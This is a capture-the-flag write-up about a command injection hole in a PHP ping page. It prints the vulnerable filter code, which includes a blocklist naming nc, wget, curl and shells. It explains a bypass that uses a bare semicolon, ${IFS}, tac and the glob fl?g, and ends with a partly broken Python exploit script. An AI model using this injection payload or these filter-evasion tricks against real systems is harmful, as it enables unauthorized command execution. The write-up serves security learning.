In this challenge we were given a simple website that served a static page. Checking the source code we find that we can also access /bing.php
if (isset($_POST['Submit'])) {
$target = trim($_REQUEST['ip']);
$substitutions = array(
' ' => '',
'&' => '',
'&&' => '',
'(' => '',
')' => '',
'-' => '',
'`' => '',
'|' => '',
'||' => '',
'; ' => '',
'%' => '',
'~' => '',
'<' => '',
'>' => '',
'/ ' => '',
'\\' => '',
'ls' => '',
'cat' => '',
'less' => '',
'tail' => '',
'more' => '',
'whoami' => '',
'pwd' => '',
'busybox' => '',
'nc' => '',
'exec' => '',
'sh' => '',
'bash' => '',
'php' => '',
'perl' => '',
'python' => '',
'ruby' => '',
'java' => '',
'javac' => '',
'gcc' => '',
'g++' => '',
'make' => '',
'cmake' => '',
'nmap' => '',
'wget' => '',
'curl' => '',
'scp' => '',
'ssh' => '',
'ftp' => '',
'telnet' => '',
'dig' => '',
'nslookup' => '',
'iptables' => '',
'chmod' => '',
'chown' => '',
'chgrp' => '',
'kill' => '',
'killall' => '',
'service' => '',
'systemctl' => '',
'sudo' => '',
'su' => '',
'flag' => '',
$target = str_replace(array_keys($substitutions), $substitutions, $target);
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec('ping ' . $target);
} else {
$cmd = shell_exec('ping -c 4 ' . (string)$target);
echo $cmd;
This is a simple program. It looks for the ip
data in our POST
request and then filters various shell commands in order to prevent us from being able to execute command. And once its done with the filters it pings our given ip using $cmd = shell_exec('ping -c 4 ' . (string)$target);
We had to find a way to bypass the filters. If you notice carefully, the filter checks for ;
instead of ;
(notice the space). Which means ;
would not be detected by the filter, thus we can use to execute our commands.
It is also filtering out spaces for which we can easily bypass using ${IFS}
Now, in order to read the flag we need to use something like cat
but that is also blocked. We can use another command called tac
here which was not blocked (there must be many other commands, I found this one when I was going through the previous year web challenges of DeadSecCTF here).
And for bypassing the flag
filter we can replace it with fl?g
which will also still print the flag for us.
Thus we can get the flag using this exploit.
import requests
baseURL = "" # Your instance URL here (like
def bing(cmd):
url = baseURL + '/bing.php'
sendData = {"ip": cmd, "Submit": "Submitted"}
r =, data=sendData)
return r
exploit = ";${IFS}tac${IFS}/fl?g.txt"